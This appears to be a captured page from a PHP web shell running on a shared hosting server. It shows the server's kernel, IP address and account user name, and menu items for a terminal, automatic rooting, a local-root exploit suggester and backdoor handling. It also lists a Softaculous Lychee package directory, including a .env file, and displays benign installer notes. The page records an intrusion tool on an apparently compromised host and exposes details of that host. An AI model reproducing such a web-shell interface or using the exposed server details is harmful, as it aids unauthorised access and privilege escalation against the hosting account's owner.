Linux server64.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
Server IP : 198.54.116.248 & Your IP : 216.73.216.104
Domains :
Cant Read [ /etc/named.conf ]
User : tailxcij
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
lychee /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-01-30 23:23
php53
[ DIR ]
drwxr-xr-x
2026-01-30 23:23
php56
[ DIR ]
drwxr-xr-x
2026-01-30 23:23
php71
[ DIR ]
drwxr-xr-x
2026-01-30 23:23
php81
[ DIR ]
drwxr-xr-x
2026-01-30 23:23
php82
[ DIR ]
drwxr-xr-x
2026-01-30 23:23
.env
10.95
KB
-rw-r--r--
2026-01-30 12:27
.htaccess
313
B
-rw-r--r--
2023-01-05 10:07
_clone.php
2.9
KB
-rw-r--r--
2021-12-23 11:54
_edit.php
4.53
KB
-rw-r--r--
2021-12-23 11:54
_edit.xml
433
B
-rw-r--r--
2021-12-23 11:54
_upgrade.php
3.2
KB
-rw-r--r--
2022-08-09 09:24
_upgrade.xml
582
B
-rw-r--r--
2022-08-09 09:24
changelog.txt
14.17
KB
-rw-r--r--
2026-01-28 12:17
extend.php
9.89
KB
-rw-r--r--
2026-01-30 12:30
fileindex.php
226
B
-rw-r--r--
2022-12-26 11:09
import.php
4.03
KB
-rw-r--r--
2026-01-30 12:30
info.xml
4.65
KB
-rw-r--r--
2026-01-30 12:27
install.js
924
B
-rw-r--r--
2021-12-23 11:54
install.php
5.54
KB
-rw-r--r--
2026-01-30 12:30
install.xml
448
B
-rw-r--r--
2021-12-23 11:54
lychee.sql
119.85
KB
-rw-r--r--
2026-01-30 12:27
lychee.zip
42.17
MB
-rw-r--r--
2026-01-30 12:27
md5
2.25
KB
-rw-r--r--
2026-01-30 12:30
notes.txt
1.88
KB
-rw-r--r--
2026-01-28 12:17
update_pass.php
612
B
-rw-r--r--
2022-09-05 11:24
Save
Rename
1. PHP REQUIREMENT LINK : https://lycheeorg.dev/docs/#server-requirements 2. Installer is at http://{{URL}}/public 3. Upgrade is disabled as user name and password are reset after upgrade due to major structural changes from 3.1 to 3.2. Mentioned here: https://github.com/LycheeOrg/Lychee/issues/278 Provide upgrade in next release as upgrade is possible from 3.2.x to 3.2.x 4. Comment security policy header in .htaccess in our zip i.e Header set Content-Security-Policy "default-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self'; connect-src 'self' https://lycheeorg.github.io; form-action 'none'; base-uri 'none'; frame-ancestors 'none'; upgrade-insecure-requests; block-all-mixed-content;" . This is needed to install the script on non https servers.(Needed while manual installation as well). Mentioned here : https://lycheeorg.github.io/docs/ 5. Upgrade method https://lycheeorg.dev/docs/update.html#update-manually 6. We have enabled upgrade from 4.0.x versions. 7. Upgrade from 4.5.3 to 4.6.0 was checked but kept disabled due to 500 HttpException Undefined variable $locale (View: /{{PATH}}/resources/views/gallery.blade.php). Add upgrade once this is resolved. 8. Important note : Keep 'csp' => ['enable' => false in config/secure-headers.php in our zip package(default is true). We do this because logs are not visible in admin panel if csp is enabled. https://github.com/LycheeOrg/Lychee/issues/1884 (Checked and not required anymore. No error is thrown even if the default is true) 9. Changelog: https://lycheeorg.dev/docs/releases.html 10. In .env keep double quotes in "[[softdbpass]]" and keep APP_URL and APP_DIR as we do. 11. Since 7.1.x Lychee UI installer doesn't start on its own, Hence we first rename env.example to .env and fill the database details and run following command. php artisan key:generate php artisan migrate After this we can access URL/public and create the admin user.